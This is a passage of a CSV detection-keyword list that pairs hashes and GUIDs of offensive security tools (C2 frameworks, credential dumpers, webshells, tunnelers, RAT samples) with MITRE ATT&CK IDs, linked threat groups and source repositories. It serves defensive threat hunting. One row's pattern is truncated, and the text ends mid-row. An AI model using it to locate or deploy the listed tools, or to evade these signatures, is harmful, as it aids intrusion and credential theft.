"*fd02da9d1f33b20c564f42fe23e92810e74485879a0257ba9c01643ebe38e623*",".{0,1000}fd02da9d1f33b20c564f42fe23e92810e74485879a0257ba9c01643ebe38e623.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","44622" "*fd04fd7f9fcc43cca1aca5ec9050e6f7229decc563b2e31c8d0af385d425980e*",".{0,1000}fd04fd7f9fcc43cca1aca5ec9050e6f7229decc563b2e31c8d0af385d425980e.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","44623" "*fd0571eeb3d23326429a47df6b1104383efca78191f36099897ec29e5a4da50e*",".{0,1000}fd0571eeb3d23326429a47df6b1104383efca78191f36099897ec29e5a4da50e.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","44624" "*fd0b9f09770685ed6f40ecabcd31bc467fa22801164b52fdc638334009b7c06f*",".{0,1000}fd0b9f09770685ed6f40ecabcd31bc467fa22801164b52fdc638334009b7c06f.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","#filehash","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","44626" "*fd0c892807df56578a3beb415d800c765873ed72ab256f5cffdb5cccd086fd27*",".{0,1000}fd0c892807df56578a3beb415d800c765873ed72ab256f5cffdb5cccd086fd27.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#filehash","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","44627" "*fd0d7ca03da27a8a9994e2d7238f864fe4bba8a1fe714e9f2fd9817368f7ff89*",".{0,1000}fd0d7ca03da27a8a9994e2d7238f864fe4bba8a1fe714e9f2fd9817368f7ff89.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44628" "*fd13ae5d3ace637c564434554f669a30cd5d527c918d1681c856e62f2a4dea85*",".{0,1000}fd13ae5d3ace637c564434554f669a30cd5d527c918d1681c856e62f2a4dea85.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","44630" "*fd1daf2fee0474c801fa389ad01576a42931f519ed59727388de4674c4643fc5*",".{0,1000}fd1daf2fee0474c801fa389ad01576a42931f519ed59727388de4674c4643fc5.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","0","#filehash","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","44632" "*fd2199463d699a530ca73f52434a033fcbcbd7b79b44b078a8461ad8dbdea36f*",".{0,1000}fd2199463d699a530ca73f52434a033fcbcbd7b79b44b078a8461ad8dbdea36f.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - 
Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","44633" "*fd228d94224c9daa219509f1f2ef6b365b070ebcf0f7337df5655a9d58fcc6d2*",".{0,1000}fd228d94224c9daa219509f1f2ef6b365b070ebcf0f7337df5655a9d58fcc6d2.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","44634" "*fd36746c68cdf7b32e63adaaa7b3e863b9769582f703722b88d9bf0b94030434*",".{0,1000}fd36746c68cdf7b32e63adaaa7b3e863b9769582f703722b88d9bf0b94030434.{0,1000}","offensive_tool_keyword","phishery","Phishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication. Phishery also provides the ability easily to inject the URL into a .docx Word document.","T1566.001 - T1071 - T1204.002","TA0001 ","N/A","BERSERK BEAR","Phishing","https://github.com/ryhanson/phishery","1","0","#filehash","N/A","9","10","993","209","2017-09-11T15:42:10Z","2016-09-25T02:19:24Z","44638" "*fd3bc4e3109f3d449cd27068c2b2600b852dbd2e35a67819d6a811b51027650d*",".{0,1000}fd3bc4e3109f3d449cd27068c2b2600b852dbd2e35a67819d6a811b51027650d.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","44640" "*fd46836c80290243763470fd731ff29e0190fe91c23284aebafc31bbdca041b6*",".{0,1000}fd46836c80290243763470fd731ff29e0190fe91c23284aebafc31bbdca041b6.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","44641" "*fd47e1128af3726647068ef2aafc9c00fe1403bf2a2b079f20994efff2db492d*",".{0,1000}fd47e1128af3726647068ef2aafc9c00fe1403bf2a2b079f20994efff2db492d.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44642" "*fd47e488528dfd7d415d1acf06332b12f2d40702328a467ef5d04c4c0a892fe6*",".{0,1000}fd47e488528dfd7d415d1acf06332b12f2d40702328a467ef5d04c4c0a892fe6.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","#filehash","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","44643" "*fd52f1cd337f51b76463cc12d6d0c32108a324d6d72d57c852326053ca608495*",".{0,1000}fd52f1cd337f51b76463cc12d6d0c32108a324d6d72d57c852326053ca608495.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - 
TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","#filehash","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","44646" "*fd57273dcd84084b20ad214de3b38c4e5a3f506da7810574d4a68dcdd63176cb*",".{0,1000}fd57273dcd84084b20ad214de3b38c4e5a3f506da7810574d4a68dcdd63176cb.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","44648" "*fd5944e10bd3a9c8bbb73615c6b5c730e0d0b9bd9fcaee9a1b5d40d8a95078b8*",".{0,1000}fd5944e10bd3a9c8bbb73615c6b5c730e0d0b9bd9fcaee9a1b5d40d8a95078b8.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","44649" "*fd6af36ad90f3287d849c6542f3dacd29cc06cb01bdf618a2168d0968a757894*","#f","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. 
It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","#filehash","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","44651" "*FD6BDF7A-FEF4-4B28-9027-5BF750F08048*",".{0,1000}FD6BDF7A\-FEF4\-4B28\-9027\-5BF750F08048.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#GUIDproject","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","44653" "*fd735c976b71fe21f1f35dca8977865e69e4bb3a49ffb7c64c65d3a235d237a4*",".{0,1000}fd735c976b71fe21f1f35dca8977865e69e4bb3a49ffb7c64c65d3a235d237a4.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","44654" "*fd744dbf0650a39ffac5325802e88075610333f5e4e0ef538da4dbfe91a712d0*",".{0,1000}fd744dbf0650a39ffac5325802e88075610333f5e4e0ef538da4dbfe91a712d0.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - 
TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44655" "*fd75b0dd9d0f11263480daccf04b635ddf74eae974794a80def9f6d2d511eb86*",".{0,1000}fd75b0dd9d0f11263480daccf04b635ddf74eae974794a80def9f6d2d511eb86.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","44656" "*fd781d2a9ae86e8131b370be6b96807f532b41f093d8d85f906e9c2ece2f6c64*",".{0,1000}fd781d2a9ae86e8131b370be6b96807f532b41f093d8d85f906e9c2ece2f6c64.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","44657" "*fd7bbbf6cbc5d86a8c6ec8caa40aef39961bf9b3d15b515dbcd2469bf15e390b*",".{0,1000}fd7bbbf6cbc5d86a8c6ec8caa40aef39961bf9b3d15b515dbcd2469bf15e390b.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","44658" "*fd8303c18bb8893e7d539cced09d4765805a37bd9ac5c92951ab381c70eec2a7*",".{0,1000}fd8303c18bb8893e7d539cced09d4765805a37bd9ac5c92951ab381c70eec2a7.{0,1000}","offensive_tool_keyword","mimipenguin","A tool to dump the login password from the current linux user","T1003.007","TA0006 - TA0002 ","N/A","TeamTNT","Credential Access","https://github.com/huntergregal/mimipenguin","1","0","#filehash #linux","N/A","10","10","3940","644","2023-05-17T13:20:46Z","2017-03-28T21:24:28Z","44660" "*fd874b4038adf9ab4f9008aa429591c825c879a51e1efc6c80d8491a7eadfdab*",".{0,1000}fd874b4038adf9ab4f9008aa429591c825c879a51e1efc6c80d8491a7eadfdab.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","44661" "*fd888cbda2c55514b80fc0aa97688abc5490ee41b8ca5c29e2f4ed3f5433a3d0*",".{0,1000}fd888cbda2c55514b80fc0aa97688abc5490ee41b8ca5c29e2f4ed3f5433a3d0.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44662" "*fd8dddeb318eb9ccdeea441dfed3a0b01c1187e1b165b75e7aaf515142abb171*",".{0,1000}fd8dddeb318eb9ccdeea441dfed3a0b01c1187e1b165b75e7aaf515142abb171.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","44663" "*FD93D181-2EC5-4863-8A8F-5F8C84C06B35*",".{0,1000}FD93D181\-2EC5\-4863\-8A8F\-5F8C84C06B35.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","44665" "*fd97e0ace21c435be9c5d10af9c2c04685069007614db6f46b06237beee2a458*",".{0,1000}fd97e0ace21c435be9c5d10af9c2c04685069007614db6f46b06237beee2a458.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","44666" "*fd9af8832336604029ef8f8ce6c35f5b24efdcd593b5092ed4774dae62d8e9f8*",".{0,1000}fd9af8832336604029ef8f8ce6c35f5b24efdcd593b5092ed4774dae62d8e9f8.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","44667" 
"*fd9e681fed790247964ded20c2e72d566e55f7770f05838f2490521ac97472f2*",".{0,1000}fd9e681fed790247964ded20c2e72d566e55f7770f05838f2490521ac97472f2.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44668" "*fda01773787fa74e66a7ecb944653dddd36fc7b298ff32ebbb06ab2099df4478*",".{0,1000}fda01773787fa74e66a7ecb944653dddd36fc7b298ff32ebbb06ab2099df4478.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44669" "*fda9ab818e038db8e7813ebfc1cdf52d3726c0ea08019b40d8b6088273d1bb07*",".{0,1000}fda9ab818e038db8e7813ebfc1cdf52d3726c0ea08019b40d8b6088273d1bb07.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","44672" "*fda9f77c0d77595aa3ca203b65a883e93bcf05603affd7911cff9e96da0e7bba*",".{0,1000}fda9f77c0d77595aa3ca203b65a883e93bcf05603affd7911cff9e96da0e7bba.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the 
security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","44673" "*fdacab27da00156282cbb603a0cb61d6e62521294c4f2cba576ef156f2b4cf2d*",".{0,1000}fdacab27da00156282cbb603a0cb61d6e62521294c4f2cba576ef156f2b4cf2d.{0,1000}","offensive_tool_keyword","EternalBlack","EternalRomance exploit implemented by Playbit EternalBlack often used by ransomware group like Dispossessor","T1210 - T1489 - T1105 - T1486","TA0001 - TA0002 - TA0009 - TA0040","EternalBlack","Dispossessor ","Exploitation tool","https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","44675" "*fdad34a59a97f03cc8b8da455730e1bf8557c95dcf866b38971afa75e0c34026*",".{0,1000}fdad34a59a97f03cc8b8da455730e1bf8557c95dcf866b38971afa75e0c34026.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","44676" "*fdb1df0047a31328f0796bd07caf642efc35651ad78389025eb5afa2748bcd04*",".{0,1000}fdb1df0047a31328f0796bd07caf642efc35651ad78389025eb5afa2748bcd04.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","0","#filehash","N/A","10","1","65","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z","44677" 
"*fdb2a63af6a5ae9aa60ceceb9e928188ac793a89f5282ed44c0d4be5f79559bb*",".{0,1000}fdb2a63af6a5ae9aa60ceceb9e928188ac793a89f5282ed44c0d4be5f79559bb.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","44678" "*fdbf3b81cd69caf5230d76a8b039fd99*",".{0,1000}fdbf3b81cd69caf5230d76a8b039fd99.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#filehash","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","44680" "*fdc0ec0cc895f5b0440d942c0ab60eedeb6e6dca64a93cecb6f1685c0a7b99ae*",".{0,1000}fdc0ec0cc895f5b0440d942c0ab60eedeb6e6dca64a93cecb6f1685c0a7b99ae.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). 
It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","44682" "*fdc5410744b30ec6b9140458af7cda10c329d512934fdbdffbbef9c7c537b2ef*",".{0,1000}fdc5410744b30ec6b9140458af7cda10c329d512934fdbdffbbef9c7c537b2ef.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44684" "*fdc984c09659c0ebf330d319bdebc772440dde7543aa6f74fd523a02fca2811d*",".{0,1000}fdc984c09659c0ebf330d319bdebc772440dde7543aa6f74fd523a02fca2811d.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","44685" "*fdcd0eb6e702e697cfda7697b058232f8b0cebbf48dbaf5fcc284ea1ca1f1b59*",".{0,1000}fdcd0eb6e702e697cfda7697b058232f8b0cebbf48dbaf5fcc284ea1ca1f1b59.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44686" 
"*FDD654F5-5C54-4D93-BF8E-FAF11B00E3E9*",".{0,1000}FDD654F5\-5C54\-4D93\-BF8E\-FAF11B00E3E9.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#GUIDproject","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","44688" "*FDD654F5-5C54-4D93-BF8E-FAF11B00E3E9*",".{0,1000}FDD654F5\-5C54\-4D93\-BF8E\-FAF11B00E3E9.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","#GUIDproject","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","44689" "*fdd96ea14514b4f377414ec9bec2ba356e0d4ea8f019ed34a9764f960884b386*",".{0,1000}fdd96ea14514b4f377414ec9bec2ba356e0d4ea8f019ed34a9764f960884b386.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","44690" "*fde15f9ac15ce720fff310f70bf5d36843516dbda4d98c9bfbcdec6ce44f28e8*",".{0,1000}fde15f9ac15ce720fff310f70bf5d36843516dbda4d98c9bfbcdec6ce44f28e8.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - 
